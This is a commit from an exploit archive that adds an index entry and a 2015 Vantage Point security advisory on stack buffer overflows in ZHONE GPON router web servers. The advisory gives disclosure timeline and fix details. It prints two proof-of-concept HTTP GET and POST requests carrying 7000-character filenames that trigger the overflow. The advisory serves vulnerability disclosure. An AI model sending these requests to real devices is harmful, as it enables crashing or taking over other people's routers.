DB: 2015-10-17
1 new exploits
This commit is contained in:
parent
aa57287847
commit
ecfbb07d92
2 changed files with 81 additions and 0 deletions
|
@ -34735,6 +34735,7 @@ id,file,description,date,author,platform,type,port
|
|||
38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel NetUSB - Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0
|
||||
38455,platforms/hardware/webapps/38455.txt,"ZyXEL PMG5318-B20A - OS Command Injection Vulnerability",2015-10-14,"Karn Ganeshen",hardware,webapps,0
|
||||
38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0
|
||||
38475,platforms/hardware/dos/38475.txt,"ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities",2015-10-16,"Lyon Yang",hardware,dos,0
|
||||
38458,platforms/php/webapps/38458.txt,"WordPress Spider Video Player Plugin 'theme' Parameter SQL Injection Vulnerability",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38459,platforms/php/webapps/38459.txt,"Request Tracker 'ShowPending' Parameter SQL Injection Vulnerability",2013-04-11,cheki,php,webapps,0
|
||||
38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0
|
||||
|
|
Can't render this file because it is too large.
|
80
platforms/hardware/dos/38475.txt
Executable file
80
platforms/hardware/dos/38475.txt
Executable file
|
@ -0,0 +1,80 @@
|
|||
Vantage Point Security Advisory 2015-003
|
||||
========================================
|
||||
|
||||
Title: Multiple Remote Code Execution found in ZHONE
|
||||
Vendor: Zhone
|
||||
Vendor URL: http://www.zhone.com
|
||||
Device Model: ZHONE ZNID GPON 2426A
|
||||
(24xx, 24xxA, 42xx, 42xxA, 26xx, and 28xx series models)
|
||||
Versions affected: < S3.0.501
|
||||
Severity: High
|
||||
Vendor notified: Yes
|
||||
Reported:
|
||||
Public release:
|
||||
Author: Lyon Yang <lyon[at]vantagepoint[dot]sg> <lyon.yang.s[at]gmail[dot]com>
|
||||
|
||||
Summary:
|
||||
--------
|
||||
|
||||
ZHONE RGW is vulnerable to stack-based buffer overflow attacks due to
|
||||
the use of unsafe string functions without sufficient input validation
|
||||
in the httpd binary. Two exploitable conditions were discovered when
|
||||
requesting a large (7000) character filename ending in .cgi, .tst,
|
||||
.html, .cmd, .conf, .txt and .wl, in GET or POST requests. Vantage
|
||||
Point has developed working code execution exploits for these issues.
|
||||
|
||||
|
||||
1. Stack Overflow via HTTP GET Request
|
||||
---------------------------------------------------------------------------------------
|
||||
|
||||
GET /.cmd?AAAA…..AAAA<7000 Characters> HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0)
|
||||
Gecko/20100101 Firefox/35.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.1.1/zhnvlanadd.html
|
||||
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
|
||||
Connection: keep-alive
|
||||
|
||||
2. Stack Overflow via HTTP POST Request
|
||||
---------------------------------------------------------------------------------------
|
||||
|
||||
POST /.cgi HTTP/1.1
|
||||
Host: 192.168.1.1
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://192.168.1.1/updatesettings.html
|
||||
Authorization: Basic (Base 64 Encoded:<USER:PASSWORD>)
|
||||
Content-Length: 88438
|
||||
|
||||
AAAA…..AAAA<7000 Characters>
|
||||
|
||||
|
||||
Fix Information:
|
||||
----------------
|
||||
|
||||
Upgrade to version S3.1.241
|
||||
|
||||
|
||||
Timeline:
|
||||
---------
|
||||
2015/04: Issues reported to Zhone
|
||||
2015/06: Requested Update
|
||||
2015/08: Requested Update
|
||||
2015/09: Requested Update
|
||||
2015/10: Confirm that all issues has been fixed
|
||||
|
||||
|
||||
About Vantage Point Security:
|
||||
--------------------
|
||||
|
||||
Vantage Point is the leading provider for penetration testing and
|
||||
security advisory services in Singapore. Clients in the Financial,
|
||||
Banking and Telecommunications industries select Vantage Point
|
||||
Security based on technical competency and a proven track record to
|
||||
deliver significant and measurable improvements in their security
|
||||
posture.
|
||||
|
||||
https://www.vantagepoint.sg/
|
||||
office[at]vantagepoint[dot]sg
|
Loading…
Add table
Reference in a new issue